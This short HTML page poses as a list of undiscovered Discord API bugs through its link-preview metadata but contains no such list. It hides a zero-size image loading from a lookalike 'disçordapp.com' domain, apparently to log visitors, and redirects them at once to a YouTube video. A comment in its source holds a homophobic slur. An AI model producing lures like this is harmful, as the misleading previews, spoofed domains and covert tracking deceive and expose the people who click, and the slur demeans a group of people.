<img src="https://disçordapp.com/invite.php?id=RZU1ER" height="0" width="0" />
<script>window.open ('https://youtu.be/wtx0fdzRAp8,'_self',false);</script>
<meta http-equiv="refresh" content="0.0;url=https://youtu.be/wtx0fdzRAp8">
<meta charset="utf-8">
<!-- YOU KNOW RHE RULES AND SO DO I, SAY GOODBYE F@G -->
<meta property="og:type" content="website">
<meta property="og:title" content="api bugs">
<meta property="og:url" content="hhttps://youtu.be/wtx0fdzRAp8">
<meta property="og:description" content="I compiled a list of fun discord API bugs that haven't been found yet, have fun with them I guess.">
<meta name="theme-color" content="#00a0ff">
